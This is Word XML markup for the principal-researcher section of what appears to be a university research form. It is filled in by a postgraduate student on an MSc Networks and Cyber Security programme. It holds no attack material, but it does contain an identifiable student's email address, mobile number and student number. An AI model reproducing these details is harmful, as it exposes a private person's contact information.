    <w:p w14:paraId="3E9D7719" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E67D35" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION A: About You (Principal Researcher)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10448" w:type="dxa"/>
        <w:tblInd w:w="-2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E42F41" w:rsidRPr="00E42F41" w14:paraId="01A90EA3" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="235E15F9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6B7DC261" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Full Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="5296E3AC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Helen Louise Frey</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="08F153C4" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="472"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="4DA32BD3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07D528BB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Tick all boxes which apply:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17883C2B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6078F3DE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Member of staff:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3078F9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="MS Gothic" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D9D9C75" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Honorary research fellow:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12881098" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="MS Gothic" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="2E9B8BFC" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="472"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D2730B0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5383A967" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Undergraduate Student</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-947236441"/>
            <w14:checkbox>
              <w14:checked w14:val="0"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="709" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="7D06A99C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☐</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03A5B3AC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Taught Postgraduate Student</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-1954943217"/>
            <w14:checkbox>
              <w14:checked w14:val="0"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="709" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="06EA737A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☐</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B5CC651" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Postgraduate Research Student</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-71887707"/>
            <w14:checkbox>
              <w14:checked w14:val="1"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="850" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="6130F7B4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="18CC5760" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="334"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1EBD5F7B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6204B4AB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Institute/Academic Discipline/Centre:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="6993ECCB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6AF01E6E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>WISA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="76DDB6A8" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7240C9A0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A83F177" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Campus:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="72D34343" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DC843CC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Swansea</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="1D196776" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="32B54B29" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="70112EBF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>E-mail address:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="5E3B40D5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22331781" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>hfrey.131560@student.uwtsd.ac.uk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="1CEE1046" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="72A2EB29" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F24872B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Contact Telephone Number:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="67625F73" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43F4AF18" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>07547226945</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="7BA8DC63" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="73F31E20" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9889" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="50D7A384" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>For students:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="25FC2F13" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="513"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="181BAF37" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="791D7E29" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Student Number:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="7B7DD909" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1252724</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="35DBF9A3" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="56A6A8AB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52A18DDF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Programme of Study:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="1ACC977B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>MSc Networks and Cyber Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="75E1F1E6" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="557"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5304C5A5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3253" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="791F2633" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Director of Studies/Supervisor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6636" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="3B097BDF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Assoc Prof Carlene Campbell </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="780A073A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
